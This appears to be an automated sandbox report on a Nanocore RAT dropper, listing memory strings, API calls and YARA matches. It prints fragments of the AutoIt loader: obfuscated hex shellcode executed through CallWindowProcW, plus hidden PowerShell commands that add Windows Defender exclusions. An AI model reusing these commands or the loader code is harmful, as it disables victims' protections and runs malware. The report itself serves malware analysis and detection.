Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $binbuffer = dllstructcreate("byte[" & binarylen($binary) & "]")\
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ret = dllcall("user32.dll", "int", "callwi" & "ndowprocw", "ptr", dllstructgetptr($bufferasm), "ws" & "tr", $sexemodule, "ptr", dllstructgetptr($binbuffer), "int", 0, "int", 0)$
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: local $ssssss = "/x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "//8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4"&
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $ssssss &= "ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////"i
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)m
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)n
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c7
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fe2bf5bb596b6630a89aea0e
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953~
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6k
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6t
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247ce
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd3ae6ba444d621ea380d6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c720ee97637d6621af97e8247c0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6!
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6[
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9eb36e28b456c771ba794ea0ed
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9fd2bf3bc5976752680b7d6u
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9ea27f5fb536c7d27bfa6df36518953r
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: btklr
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0xh*5z
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0x6,5
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \rings
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: array
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: exe_c
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: le3t?
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reg_sz
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: runonce0
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6-
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: arrayslist
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9f80cd4977c777331a38bd6
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scriptdir
Source: boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00253312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BEBB3 mouse_event,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002B13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007228000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000000.395755947.0000000000313000.00000002.00000001.01000000.0000000A.sdmp, boaliim.dat.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B28000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: boaliim.dat	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerD$
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managero
Source: boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.649636221.0000000006E6C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Managerp
Source: RegSvcs.exe, 0000000D.00000002.633864809.0000000001ABE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program Managerram Manager
Source: RegSvcs.exe, 0000000D.00000002.652061665.0000000007DBE000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: Program ManagerJ
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: RegSvcs.exe, 0000000D.00000002.636564713.0000000003B3A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager\2
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000038E7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000039E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000390F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerHa

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F654 cpuid

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_0028BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002AE5F8 GetUserNameW,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0095B146 GetVersionExW,

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Source: boaliim.dat	Binary or memory string: WIN_81
Source: boaliim.dat	Binary or memory string: WIN_XP
Source: boaliim.dat.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 